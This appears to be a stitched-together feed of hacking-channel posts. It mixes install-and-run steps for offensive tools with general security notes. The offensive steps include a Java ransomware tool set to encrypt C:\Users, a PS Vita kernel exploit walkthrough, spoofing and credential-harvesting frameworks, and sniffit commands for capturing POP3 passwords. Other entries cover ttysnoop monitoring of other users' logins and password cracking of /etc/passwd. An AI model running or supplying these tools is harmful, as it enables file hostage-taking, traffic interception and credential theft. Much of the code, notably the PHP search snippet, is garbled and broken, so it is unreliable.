▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 part 2 - Build your own site search engine
This way, if the keyword entered by the visitor is empty, a prompt can be made. Here is iterating through all the files.
twitter.com/UndercOdeTC

1) We can iterate through all the files recursively, using the functions opendir, readdir, or PHP Directory classes. We now use the former.
<PHP?
// function to traverse all files
function listFiles ( $ dir ) {
$ handle = opendir ( $ dir );
the while ( false ! == ( $ File = readdir ( $ handle ))) {
IF ( $ file ! = "." && $ file ! = ".." ) {
// If it is a directory, continue searching
if ( is_dir ( "$ dir / $ file" )) {
listFiles ( "$ dir / $ file" );
}
else {
// Process it here
}
}
}
}

?>

2) In the red text place, we can read and process the searched file. The following is the content of the read file And check whether the content contains the keyword $ keyword, if it contains, the file address is assigned to an array.
<? php
// $ dir is the search directory, $ keyword is the search keyword, and $ array is the array to store

3) function listFiles ( $ dir , $ keyword , & $ array ) (
$ handle = opendir ( $ dir );
while ( false ! == ( $ file = readdir ( $ handle ))) {
if ( $ file!="."&&$file!=".."){
if(is_dir("$dir/$file")){
listFiles("$dir/$file",$keyword,$array);
}

else{
//@undercodeofficial
$data=fread(fopen("$dir/$file","r"),filesize("$dir/$file"));

if($file!=”search.php”){

if(Now combine this result with the program at the beginning, enter a keyword, and you will find that relevant results in your website are searched out. We are perfecting it now.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Automate process invoke extensions to block additional sites by category.
> Extending and consolidating hosts files from several well-curated sources like adaway .org, mvps. org, malwaredomainlist. com, someonewhocares. org, and potentially others. You can optionally
pinterest.com/UndercOdeOfficial

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/StevenBlack/hosts

2) cd hosts

3) pip3 install --user -r requirements.txt

4) python3 updateHostsFile.py [--auto] [--replace] [--ip nnn.nnn.nnn.nnn] [--extensions ext1 ext2 ext3]

🦑Commands :

>--help, or -h: display help.

--auto, or -a: run the script without prompting. When --auto is invoked,

Hosts data sources, including extensions, are updated.
No extensions are included by default. Use the --extensions or -e flag to include any you want.
Your active hosts file is not replaced unless you include the --replace flag.
--backup, or -b: Make a backup of existing hosts file(s) as you generate over them.

--extensions <ext1> <ext2> <ext3>, or -e <ext1> <ext2> <ext3>: the names of subfolders below the extensions folder containing additional category-specific hosts files to include in the amalgamation. Example: --extensions porn or -e social porn.

--flush-dns-cache, or -f: skip the prompt for flushing the DNS cache. Only active when --replace is also active.

--ip nnn.nnn.nnn.nnn, or -i nnn.nnn.nnn.nnn: the IP address to use as the target. Default is 0.0.0.0.

--keepdomaincomments, or -k: true (default) or false, keep the comments that appear on the same line as domains. The default is true.

--noupdate, or -n: skip fetching updates from hosts data sources.

--output <subfolder>, or -o <subfolder>: place the generated source file in a subfolder. If the subfolder does not exist, it will be created.

--replace, or -r: trigger replacing your active hosts

--skipstatichosts, or -s: false (default) or true, omit the standard section at the top, containing lines like 127.0.0.1 localhost. This is useful for configuring proximate DNS services on the local network.

--compress, or -c: false (default) or true, Compress the hosts file ignoring non-necessary lines (empty lines and comments) and putting multiple domains in each line. Reducing the number of lines of the hosts file improves the performances under Windows (with DNS Client service enabled).

--minimise, or -m: false (default) or true, like --compress, but puts each domain on a separate line. This is necessary because many implementations of URL blockers that rely on hosts files do not conform to the standard which allows multiple hosts on a single line.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 JavaRansomware
Ransomware is malware for data kidnapping, an exploit in which the attacker encrypts the victim's dataRansomware stops you from using your PC.Ransomware spreads through e-mail attachments, infected programs and compromised websites. A ransomware malware program may also be called a cryptovirus, cryptotrojan or cryptoworm It holds your PC or files for "ransom".
T.me/UndercOdeTesting

🦑FEATURES :

Ransomware can:

1) Prevent you from accessing Windows.

2) Encrypt files so you can't use them.

3) Stop certain apps from running (like your web browser).

4) Ransomware will demand that you pay money (a “ransom”) to get access to your PC or files. We have also seen them make you complete surveys.

5) There is no guarantee that paying the fine or doing what the ransomware tells you will give access to your PC or files again.

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/PanagiotisDrakatos/JavaRansomware

2) $ cd JarPath
Encrypt All Files in the Current Path wait until the execution will be finished

3) $ java -jar JavaRansomware.jar C:\Users Encrypt
Decrypt All Files in the Current Path wait until the execution will be finished

4) $ java -jar JavaRansomware.jar C:\Users Decrypt

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Updated Fully chained kernel exploit for the PS Vita on firmwares 3.65-3.68
Instagram.com/underCodeTestingCompany


🦑 Requirements

1) Your device must be on firmware 3.65, 3.67 or 3.68. Firmware 3.69 and higher are not supported. If you're on a lower firmware, please decide carefully to what firmware you want to update, then search for a trustable guide on /r/vitahacks.

2) If your device is a phat OLED model, you need a Memory Card in order to install. There's no need for a Memory Card on Slim/PS TV models, since they already provide an Internal Storage. Make sure you have got at least 270 MB of free space.


3) Your device must be linked to any PSN account (it doesn't need to be activated though). If it is not, then you must restore default settings in order to sign in.

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) download https://github.com/TheOfficialFloW/h-encore/releases/download/v2.0/h-encore.zip
> extract

2) ownload and install qcma, psvimgtools and pkg2zip (check the releases section for the binaries).
If you don't know where to put psvimgtools and pkg2zip binaries, just put them in the h-encore folder.
>> https://codestation.github.io/qcma/
> https://github.com/yifanlu/psvimgtools
> https://github.com/mmozeiko/pkg2zip

3) Download the vulnerable DRM-free demo of bitter smile (yes, that's the user entry point).
> http://ares.dl.playstation.net/cdn/JP0741/PCSG90096_00/xGMrXOkORxWRyqzLMihZPqsXAbAXLzvAdJFqtPJLAZTgOcqJobxQAhLNbgiFydVlcmVOrpZKklOYxizQCRpiLfjeROuWivGXfwgkq.pkg

4) Extract the demo using this command in terminal/cmd:

pkg2zip -x PATH_OF_PKG
This will output the files to app/PCSG90096.

5) Copy the contents of the output app/PCSG90096 to the folder h-encore/app/ux0_temp_game_PCSG90096_app_PCSG90096 (such that the files eboot.bin and VITA_PATH.TXT are within the same folder).

6) Copy the license file app/PCSG90096/sce_sys/package/temp.bin to the folder
h-encore/license/ux0_temp_game_PCSG90096_license_app_PCSG90096 and rename the just pasted file temp.bin to 6488b73b912a753a492e2714e9b38bc7.rif. Be careful with the file extension, it should not be .rif.bin. Again, this file should be in the same folder as VITA_PATH.TXT.

7) Start qcma and within the qcma settings set the option Use this version for updates to FW 0.00 (Always up-to-date) to spoof the System Software check.

8) Launch Content Manager on your PS Vita and connect it to your computer, where you then need to select PC -> PS Vita System, and after that you select Applications. If you see an error message about System Software, you should simply reboot your device to solve it (if this doesn't solve, then put your device into airplane mode and reboot). If this does still not work, then alternatively set DNS to 212.47.229.76 to block updates. This should create a folder at PS Vita/APP/xxxxxxxxxxxxxxxx on your computer (see qcma settings where this folder is), where the folder xxxxxxxxxxxxxxxx represents the AID (account ID that is 16 characters long) that you need to insert here. If the AID is valid, it will yield a key that you can now use to encrypt the demo.

9) Change directory to the h-encore folder in terminal/cmd and use the key to encrypt all folders using (make sure you don't confuse the key with the AID, the key is 64 characters long!):

psvimg-create -n app -K YOUR_KEY app PCSG90096/app
psvimg-create -n appmeta -K YOUR_KEY appmeta PCSG90096/appmeta
psvimg-create -n license -K YOUR_KEY license PCSG90096/license
psvimg-create -n savedata -K YOUR_KEY savedata PCSG90096/savedata

10) The folder h-encore/PCSG90096 should then contain sce_sys and all 4 folders from above, and within these folders you should find files called X.psvimg and X.psvmd, where X has the same name as the folder. Backup this folder, since if everything has been done correctly, you don't need to redo all the steps to install it onto another device with the same PSN account.

11) Copy the folder h-encore/PCSG90096 to PS Vita/APP/xxxxxxxxxxxxxxxx/PCSG90096 and then select Refresh database in qcma.

The h-encore bubble with a size of around 243 MB should now appear in the Content Manager and that's what you finally need to transfer to your PS Vita. If the size does not match or you get the error C2-12858-4, then it's because you did not do it correctly! Please re-read the instructions more carefully then. If you get the error You can only copy applications that your account is the owner of, then it's because you have used an AID that is not of your account, go back to step 8.

12) Launch h-encore to exploit your device (if a message about trophies appears, simply click yes). The screen should first flash white, then purple, and finally open a menu called h-encore bootstrap menu where you can download VitaShell and install HENkaku. If it prompts the error Cannot start this application. C0-11136-2, then it's because you did not do step 6. correctly.

> Note that you have to relaunch the exploit everytime you reboot or shutdown your device. Of course if you only put your device into standby mode, you don't need to relaunch.

🦑 Tested by UndercOde

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑updated Penetration Testing Framework:
T.me/UnderCodeTesting

🦑Features :

1) RP spoofing - Man-in-the-middle.

2) ARP+DNS spoof - fake page redirect to credential harvester

3) DHCP ACK Injection spoofing - Man-in-the-middle

4) Man-in-the-middle inject BeEF hook

5) SSH Brute-Force attack.

6) Web page formulary brute-force

7) URL content buster

8) Overthrow the DNS of LAN range/IP address

9) Redirect all possible DNS queries to host

10) Get Shellcode from binary

11) Filter strings on pcap files

12) Exploit Development 1: Overwriting Instruction Pointer

13) Exploit Development 2: Ret2libc

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) sudo apt-get update

2) sudo apt-get install -y build-essential python-dev python-pip tcpdump python-capstone \

3) libnetfilter-queue-dev libffi-dev libssl-dev

🦑 With pip:
> sudo pip install pythem
With source and pip:

1) git clone https://github.com/m4n3dw0lf/pythem

2) cd pythem

3) sudo python setup.py sdist

4) sudo pip install dist/*

🦑 Running

1) Call on a terminal (Requires root privileges):
$ sudo pythem

2) Running as Docker containeRequires Docker
docker run -it --net=host --rm --name pythem m4n3dw0lf/pythem


Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to evaluate OS security full by UnderCode :
twitter.com/UndercOdeTC

🦑LETS START:

1) ---- With the development of the network, enterprises are connecting their local area network into a wide area network or their internal network into the Internet. This gives more and more people (internal and external) the opportunity to access internal network resources. As a result of this exposure, companies urgently need to address cybersecurity issues.

2) ---- A major part of providing effective security is assessing how well the existing security mechanisms are integrated with the company's network security policies—that is, determining whether the security policies are effectively implemented. The increasing complexity of the network makes it more and more difficult to implement security policies.

3) ---- Assessing the effectiveness of each network security component is necessary to ensure effective network security. The two main components that provide network security are: the firewall and the operating system (OS).

4) ---- Many companies focus their efforts on firewalls, and according to reports provided by the Aberdeen Group, the most vulnerable security holes are those that exist in the operating environment. Some vendors are committed to providing a reliable version of the operating environment, while most offer only optional, installable security services.

5) ---- The security mechanism of the operating system helps protect the machine running the OS from unauthorized access. Special protection is given to unauthorized access to specific information within the machine, specific machine instructions, and UNIX superuser instructions. Most firewalls and the Internet themselves are built on a standard, unsecured UNIX operating environment. This is why everyone is not surprised by the existence of security threats. UNIX is very insecure, it is difficult to configure, and configuration errors can lead to vulnerabilities.

🦑 The following two factors make the OS security mechanism very important:

1) A second line of defense is provided behind the firewall. Hackers often break through or bypass firewalls, and OS security policies can effectively protect the system against such intruders.

2) Defense against intruders in the enterprise. Internal intruders are already inside the firewall, and FBI reports indicate that more than 60% of computer crimes originate from within the enterprise. In most cases, the offenders are those angry employees or contract contractors.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Assessing OS security is quite difficult, especially for UNIX, because it has many variants and vendors. Assessing the security of a UNIX system requires proficiency in the following three areas:
instagram.com/UnderCodeTestingCompany

🦑LETS START:

1) setting up a UNIX system

2) Weaknesses brought by various versions of UNIX applications, including sending mail, FTP, NFS (Network File System) and TFTP (Simple File Transfer Protocol)

3) Security Patches-The

operating system is constantly patching BUGS and adding features to complicate assessments, and these updates introduce new security vulnerabilities. What is needed is a way to automatically assess operating system vulnerabilities and automatically enforce security policies. Only in this way can the gap between security policy and security enforcement be effectively assessed and closed.

4) The OS security scan file provides exactly the required solution. Scanning software runs on each machine and probes each machine through a series of tests to unearth potential weaknesses. This software evaluates the stand-alone security environment from an operating system perspective and generates a detailed report of the vulnerabilities it finds and proposes solutions.

5) System Security Scanner (S3) from ISS is a security assessment tool that facilitates the management and implementation of security policies. It enables enterprises to implement security policies across heterogeneous operating platforms. Currently, S3 supports most popular UNIX versions, including Linux, SunOS 4.1.3, Solaris, HP-UX, and AIX. It helps companies automate security assessments and maintenance on their operating system platforms. With this effective tool, companies can use the full potential of their networks to continuously increase their competitiveness—without having to worry about security.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Introduction to common Linux network security tools by UnderCode
pinterest.com/UnderCodeOfficial

🦑LETS START:

1) Although various versions of Linux distribution comes with a lot of free open-source software, but there are still a large number of useful tools are not default.
　　
2) Included in their installation CDs are, in particular, some toolkits that can enhance Linux network security, and most of them are also open source free software.

🦑 Here is a brief introduction to several tools to enhance Linux network security.

1) sudo
　　 sudo is a program used by system administrators to allow some users to run some / all system commands as root. An obvious use is to enhance the security of the site. If you need to do some daily work as root every day and often execute some fixed commands that can only be executed by root, then sudo is very suitable for you.
sudo's homepage is at: http://www.courtesan.com/courtesan/products/sudo/
　　
2) Take Redhat as an example, the following describes the installation and setup process:
　　
3) First, you can download the rpm package for Redhat Linux from the sudo homepage.
It's at ftp://ftp.freshmeat.net/pub/rpms/sudo/ currently the latest stable version 1.5.9p4.

4) 　Execute #rpm -ivh sudo * to install, then edit / etc / sudoers file with / usr / sbin / visudo.

5) If you are prompted that you cannot find / usr / bin / vi but you actually have the vi program in the directory / bin, you need
ln -sf / bin / vi / usr / bin / vi creates a symbolic link for vi under / usr / bin. (Note: I encountered this on Redhat 6.1, and this problem does not exist on Redhat 5.x)
　　
6) In addition, if some other error occurs, you may also need #chmod 700 / var / run / sudo

🦑 Below is my / etc / sudoers Example file:
[root @ sh-proxy / etc] # more sudoers
Host_Alias ​​SERVER = sh-proxy

# User alias specification

User_Alias ​​ADMIN = jephe, tome

# Cmnd alias specification

Cmnd_Alias ​​SHUTDOWN = / etc / halt, / etc / shutdown, / etc / reboot

ADMIN SERVER = SHUTDOWN
jephe SERVER = / usr / bin / tail -f / var / log / maillog
jephe SERVER = / usr / bin / tail -f / var / log / messages

# User privilege specification
root ALL = (ALL) ALL
-----------

1) Since I often need to log in to the server remotely to observe the changes in the email log file / var / log / maillog, I added this line to / etc / sudoers so that I do n’t need to log in as root to complete my daily work and improve safety.

2) Sniffit Sniffit
　　is a well-known network port probe. You can configure it to run in the background to detect which TCP / IP ports the user's input / output information is on.
　
3) The most commonly used function is that an attacker can use it to detect the data transfer on your 23 (telnet) and 110 (pop3) ports to easily get your login password and mail account password. Sniffit is basically used by the vandal. Tools, but if you want to know how to enhance the security of your site, you should first know the various tools used by intruders.

4) sniffit's homepage is at http://reptile.rug.ac.be/~coder/sniffit/sniffit.html You can download the latest version from there. Installation is very easy, just run #tar xvfz sniff * solution in the root directory Open all files to the corresponding directory.


Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Linux Network-Tools PART 2 :
> You can run sniffit -i with an interactive graphical interface to view all input / output information on the specified network interface:

🦑LETS START:

1) For example: In order to get the pop3 account and password that all users enter when receiving mail through an interface abcd, you can run
#sniffit -p 110 -t abcd &
#sniffit -p 110 -s abcd &
log files in the directory / usr / doc / sniffit * below:

2) The log file is named according to the visitor's IP address, a random high-end port number, and the network interface IP address and detection port used for detection. It takes advantage of the inherent weakness of the TCP / IP protocol, because the username and password information transmitted by ordinary telnet and pop3 are in plain text, without any encryption. So for telnet / ftp. You can use ssh / scp instead. The ssh / scp information detected by sniffit is basically a bunch of garbled characters, so you don't need to worry about the username and password information transmitted by ssh being stolen by a third party.

3) ttysnoop (s)
ttysnoop is a program that redirects all input / output to one terminal number to another terminal. At present, the website I know of is http://uscan.cjb.net , but I can't connect to it all the time. I got ttysnoop-0.12c-5 from other channels, and the address is http://rpmfind.net/linux /RPM/contrib/libc6/i386/ttysnoop-0.12c-5.i386.html This version does not seem to support shadow password. After installation, you need to manually create the directory / var / spool / ttysnoop to test this program is interesting, below Related instructions:

4) First change the in.telnetd in /etc/inetd.conf to call the login login program to / sbin / ttysnoops by default, as follows:
[root @ jephe / etc] # more inetd.conf | grep in.telnetd
telnet stream tcp nowait root / usr / sbin / tcpd in.telnetd -L / sbin / ttysnoops

5) Be sure to run killall -HUP inetd after the change to make it effective, make sure not to use shadow passwords, use #pwunconv to disable shadow passwords.
Then edit the file / etc / snooptab to configure the default configuration.
[root @ jephe / etc] # more snooptab
ttyS1 / dev / tty7 login / bin / login
ttyS2 / dev / tty8 login / bin / login
* socket login / bin / login
------

6) Finally, if in a terminal Someone logged in (you can use the w command to see which terminal it is on), if the terminal device is ttyp0, you can log in to the server and type # / bin / ttysnoop ttyp0 (prompt for the root password, again, the above mentioned This version does not support shadow passwords) to monitor user login windows.

🦑 nmap
nmap is a tool used to perform port scanning on a relatively large network. It can detect which TCP / IP ports are currently open on the server. You can run it to ensure that unsafe port numbers that should not be opened are blocked.
nmap's homepage gives a simple example at http://www.insecure.org/nmap/index.html

[root @ sh-proxy / etc] # / usr / local / bin / nmap public.sta.net .cn

1) Starting nmap V. 2.12 by Fyodor ( fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on public.sta.net.cn (202.96.199.97):
Port State Protocol Service
21 open tcp ftp
23 open tcp telnet
25 open tcp smtp
109 open tcp pop-2
110 open tcp pop-3
143 open tcp imap2
513 open tcp login
514 open tcp shell
7000 open tcp afs3-fileserver

2) Nmap run completed-1 IP address (1 host up) scanned in 15 seconds


🦑 John the ripper

1) In Linux, the password is hashed The format is stored. You cannot analyze the password from the hash data table in the reverse direction, but you can compare it with a set of word hash, and guess the password if the same. Therefore, it is critical to have a password that is difficult to guess. In general you must not use a word in a dictionary as a password, it is quite easy to guess. In addition, some common regular alphanumeric arrangements cannot be used as the password, such as 123abc.

3) John the ripper is an efficient and easy-to-use password guessing program.http://www.openwall.com/john/
Download the tar.gz format program for UNIX, and then use tar xvfz john * .tar.gz to extract it to any directory. After entering the src directory and typing make linux-x86-any-elf (I use redhat 6.1), several execution files will be generated in the run directory, including the main program john. Now run Crack./john / etc / passwd for the Crack password.

> John can also crack the password generated by htpasswd to verify the apache user password. If you create a user user with htpasswd -c apachepasswd user and generate a password, you can also use john apachepasswd to guess. John outputs it to the terminal when guessing the password, and stores the guessed password in the john.pot file.


🦑 Another password cracker is the classic Cracker that everyone knows. The homepage is at http://www.users.dircon.co.uk/~crypto/II .

1) Logcheck

Logcheck is used to automatically check the system security intrusion events and abnormal activity records. Tool, which analyzes various Linux log files,
such as / var / log / messages, / var / log / secure, / var / log / maillog, etc., and then generates a problem report that may have security issues and automatically sends email to the administrator . You can set it to run on an hourly, or daily basis with crond.

2) The homepage of the logcheck tool is at http://www.psionic.com/abacus/logcheck/After downloading, use tar xvfz logcheck * to extract to a temporary directory such as / tmp, and then use ./make linux to automatically generate the corresponding files to / usr / local / etc, / usr / local / bin / and other directories. Change settings such as who can send email notifications to the root account by default. You can set root's email alias account to a group of people. Change the settings to ignore certain types of messages such as plug-gw in your mail log file. Because plug-gw does a reverse IP lookup, if it can't find it, it will log a warning message to / var / log / maillog. Logcheck logs all these warnings to you by default. You can ignore them by setting.

3) Using the logcheck tool to analyze all your logfiles avoids you having to manually check them daily, saving time and improving efficiency.

4) Three. Tripwire

Tripwire is a very useful tool for verifying file integrity. You can define which files / directories need to be checked, but the default settings can meet most requirements. It runs in four modes: database generation mode , Database update mode, file integrity check, interactive database update. When the initialization database is generated, it generates a database file of various information on existing files. In case your system files or various configuration files are accidentally changed, replaced, or deleted, it will be based on the original database every day. Compare the existing files to find out which files have been changed. You can judge whether there are any unexpected events such as system intrusion based on the results of email.

5) Tripwire's homepage is at http://www.tripwiresecurity.com , and you can use tripwire-1.2.3 for free. If you use Redhat Linux 6.1, you can also get the latest Tripwire-1.2.3 rebuilt for 6.1
(http://rufus.w3.org/linux/RPM/powertools/6.1/i386/tripwire-1.2-3.i386.html ) When you manually change the configuration file or program in the system, you can manually generate it again

6) Database files, run tripwire-initialize to create the databases directory under the current directory and generate a new system database file under this directory, then cp to the / var / spool / tripwire directory to overwrite the old one.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 The Mobile Security Testing Guide (MSTG) is a comprehensive manual for mobile app security development, testing and reverse engineering :
T.me/UnderCodeTesting

🦑LETS START:

1) git clone https://github.com/OWASP/owasp-mstg/

2) cd owasp-mstg/Tools/

3) ./generate_document.sh

4) Clone the repository and run the gitbook generator.

🦑 This produces PDF, Epub and Mobi files in the "Generated" subdirectory.

1) git clone https://github.com/OWASP/owasp-mstg/

2) cd owasp-mstg/Tools/

3) ./gitbookandpdf.sh

check more on same git link

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Automate dns spoof - traffic hack :
T.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/Trackbool/DerpNSpoof'
You need the Scapy Python module. You can install the requirements

2) with: 'pip3 install -r requirements.txt' (recomended) or manually 'pip3 install scapy'

3) Scapy uses tcpdump

4) To execute the tool, you will need root permissions
Help menu:

🦑commands :
<ip> - Spoof the DNS query packets of a certain IP address
<all> - Spoof the DNS query packets of all hosts
[!] Examples:
# python3 DerpNSpoof.py 192.168.1.20 myfile.txt
# python3 DerpNSpoof.py all myfile.txt
The file format to save the records is very simple. You have to store the domain name, and separated by a space, the fake IP in the same line

Domain to Spoof IP address
example.com 1.1.1.1
example2.com 3.3.3.3
example3.com 3.3.3.3
Note:


@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Mm so Guyz want written Tutorials, well let s send some PHp Shell By UndercOde

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 shell-log in for a limited time :
instagram.com/UnderCodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

time-limited login can be achieved by calling at and system maintenance functions through the following three script programs:

1) In the specified When the script is executed within a certain time, a file named nologin will be generated under / etc. When the login program is executed, it will automatically determine whether this file exists. If it exists, the user will not be allowed to log in. The content is:
vi /sbin/login.denied
echo "Login Denied"> / etc / nologin
chmod 700 login.denied

2) Execute the script at the specified time, delete the nologin file under / etc / to allow users to log in, the content is:
vi /sbin/login.allowed
if [ -f / etc / nologin]; then
rm / etc / nologin
fi
chmod 700 login.allowed

3) Write a time-limited script that reads:
vi /sbin/login.rollback
if [-f /sbin/login.denied] ; then
at -f /sbin/login.denid 22:00
fi
if [-f /sbin/login.allowed]; then
at -f /sbin/login.allowed 8:00
if
chmod 744 /sbin/login.rollback is

4) created, put the /sbin/login.rollback script into crontab , Executed in the early morning every day:
crontab -e
# roll login script
00 1 * * * /sbin/login.rollback

5) The function of this setting is: from 10:00 PM to 8:00 AM the next day, a non-root user logs in, Displayed as system maintenance status.

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 shell-Can you use Shell to query, modify, delete, etc. SQL?
pinterest.com/UnderCodeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

#! / Usr / bin / ksh
SQL_EXEC ()
{
sqlplus the USER $ / $ @ $ DB the PASSWD <<!
SET LINESIZE 1024
SET pageSize 1024
$ SQLCOMM
quit
!
}

#select
SQLCOMM = "SELECT 'XXX', username from the all_users;"

SQL_EXEC | grep XXX

#insert, Delete omitted

with INformIX yo prompts what to do if sql_exec cannot be found.

I think this should work,
#vi query.sh
sqlplus $ USER / $ PASSWD << EOF
select …… from …………
insert ………………
delete ………………
EOF
: wq
# query.sh

isql <<!
database dbname;
select * from tbname where fieldname="xxxxx";
delete from tbname;
.....
close database;
!

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁